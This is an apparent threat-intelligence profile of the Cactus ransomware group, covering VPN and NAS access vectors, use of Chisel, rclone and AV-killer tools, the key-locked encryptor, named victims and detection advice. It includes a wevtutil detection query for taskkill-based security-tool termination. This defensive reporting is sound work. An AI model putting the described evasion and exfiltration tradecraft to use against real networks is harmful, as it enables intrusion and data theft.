Overview
Cactus is a ransomware operation that emerged in March 2023 and quickly established itself as an enterprise-focused threat, targeting large organisations across manufacturing, energy, retail, and professional services. Unlike many contemporaries who built their profile through high victim volume, Cactus has pursued a strategy of selectivity — fewer attacks, larger targets, and demands calibrated to victim revenue rather than a flat rate.
The group’s defining technical characteristic is a self-encryption mechanism for its encryptor binary: the ransomware payload is encrypted at rest and requires a command-line argument containing the decryption key to execute. This approach was unusual at launch and designed specifically to frustrate automated sandbox analysis — a submitted sample without its key simply does not run and reveals nothing.
Cactus operates a double-extortion model with a leak site and has been observed conducting triple extortion on high-value victims, contacting customers or partners of the victim to increase pressure on negotiation timelines.
Background
Cactus does not appear to be a direct rebrand or continuation of any prior group. Code analysis has not established clear lineage to predecessors such as BlackCat/ALPHV or Hive. The group operates an affiliate model, though it is less openly advertised than some RaaS programmes — recruitment appears to occur through private channels rather than forums.
The name refers to the group’s leak site branding and appears in ransom note headers and in the binary’s embedded strings. The group has been tracked by Kroll, Arctic Wolf, Trend Micro, and Tenable, all of whom have published technical reporting on intrusions.
Initial Access: VPN and Network Device Exploitation
Cactus’s consistent initial access method is exploitation of VPN appliances and network edge devices — particularly those running unpatched software. Documented vectors include:
Fortinet VPN vulnerabilities — CVE-2023-41671 and related FortiOS authentication bypass vulnerabilities have appeared in post-incident reporting from multiple Cactus intrusions. The group targets internet-exposed FortiGate appliances with credential stuffing and vulnerability exploitation. Unpatched instances running FortiOS versions affected by the SSL-VPN path traversal vulnerabilities remain priority targets.
QNAP NAS devices — In several intrusions, Cactus obtained initial access via internet-exposed QNAP network-attached storage devices. QNAP devices running outdated firmware have known authentication bypass and remote code execution vulnerabilities that give unauthenticated attackers a foothold into the internal network from a device that is often inadequately monitored.
Purchased access from initial access brokers — Forensic evidence from Kroll-investigated intrusions indicates that some Cactus affiliates purchase valid VPN credentials from access brokers rather than exploiting vulnerabilities directly. This is consistent with the broader RaaS ecosystem where initial access and post-exploitation are increasingly separate commercial services.
Post-Compromise Tradecraft
Once inside, Cactus intrusions follow a pattern common to enterprise ransomware operations but with several notable characteristics:
Persistence and lateral movement via legitimate tooling. Cactus operators use a combination of tools that are individually legitimate: Chisel for network tunnelling, AnyDesk and Splashtop for remote access, PSnmap (a PowerShell-based network scanner) for internal reconnaissance, and scheduled tasks for persistence. The reliance on tools with legitimate uses makes detection harder on environments that already use remote management software.
Active defence evasion. Before deploying the encryptor, Cactus operators typically attempt to disable endpoint detection and response tools. This is done through a combination of batch scripts that stop known security software services, manipulation of Windows Defender exclusions, and in some cases use of the AV-killer capabilities in tools like PCHunter or IObit Unlocker.
Exfiltration before encryption. Data is staged and exfiltrated to attacker-controlled infrastructure before encryption begins. Cactus has been observed using rclone for exfiltration, configured to send data to cloud storage services. Exfiltration volume in confirmed intrusions has ranged from tens of gigabytes to multiple terabytes.
The self-encrypting encryptor. The Cactus encryptor is distributed as an AES-encrypted binary. Execution requires a command-line argument (a key) that decrypts the payload in memory before it runs. The binary submitted to a sandbox without the key is opaque — it does not decrypt, does not execute, and does not exhibit ransomware behaviour. This is a targeted anti-analysis measure rather than a defence against incident response on live systems, where the key is present in the execution command.
Encryption combines RSA-4096 for key protection with AES-256 for file encryption. Encrypted files receive the .cts1 extension (early versions) or .cactus extension in later variants.
Notable Victims
Schneider Electric (November 2023) — The most high-profile confirmed Cactus victim is Schneider Electric, a multinational industrial automation and energy management company. Cactus claimed to have stolen approximately 1.5 terabytes of data from Schneider Electric’s Sustainability Business division, which provides energy management and sustainability reporting software to enterprise customers. The breach exposed customer data including names, email addresses, and service usage information. Schneider Electric confirmed the attack and isolated the affected environment.
Petrofac (2024) — The UK-headquartered oilfield services company confirmed a Cactus intrusion affecting internal systems. Petrofac operates across the oil and gas value chain in the Middle East, North Africa, and Europe, making it a high-value target both for ransom and for the commercially sensitive project data it holds.
Swedish retailer Brafab (2024) — Cactus claimed Swedish furniture and garden retailer Brafab as a victim, publishing samples of internal financial documents on its leak site as proof of access.
The group’s victim set skews toward companies in the €100M+ revenue bracket, with sector concentration in manufacturing, industrial services, and retail.
Detection
Cactus intrusions produce several detectable signals:
Initial access. Monitor VPN authentication logs for credential stuffing patterns — high-volume authentication attempts from diverse IP addresses against SSL-VPN interfaces, particularly outside business hours. QNAP devices should be isolated from direct internet exposure; any authentication to an internet-facing NAS should be treated as high-risk.
Lateral movement. PSnmap activity from non-standard hosts (servers, workstations that do not normally run network scanning tools) is a strong indicator of post-compromise reconnaissance. Chisel binary execution — particularly with listening or reverse-tunnel arguments — on endpoints that do not legitimately use it should alert.
Exfiltration. Rclone execution from unusual paths or with cloud storage destination arguments is a high-fidelity signal. Monitor for large outbound data transfers to cloud storage providers (particularly Mega.nz, which has appeared in Cactus exfiltration) from internal hosts.
Pre-encryption. Batch script execution that terminates security software services (stopping AV/EDR process names) and modifies Windows Defender exclusion lists are documented pre-encryption indicators in Cactus intrusions.
# High-value detection — security tool termination batch scripts
wevtutil qe Security /q:"*[System[(EventID=4688)]] and *[EventData[Data[@Name='NewProcessName'] and (Data='*taskkill*') and Data[@Name='CommandLine'] and (Data='*/F*')]]" /f:textRansom and Negotiation
Cactus ransom demands are calibrated to victim size. In publicly reported cases, demands have ranged from low seven figures to over $15 million USD for large enterprises. The group maintains a negotiation team accessible via the leak site and via Tox. Payment deadlines are typically 72 hours before data begins being published, with the initial publication being a sample set to establish credibility.
Current Activity
Cactus remained active through mid-2026, with new victims appearing on the leak site at a rate of approximately two to four per month — consistent with its enterprise-focused, lower-volume approach. The group has not been publicly disrupted by law enforcement and has not changed its branding or apparent operational structure since launch.
The group’s willingness to target industrial and manufacturing firms — and its demonstrated access to Schneider Electric environments — places it on the watch list for OT-adjacent risk teams, particularly those concerned about ransomware propagating from IT networks into connected OT environments.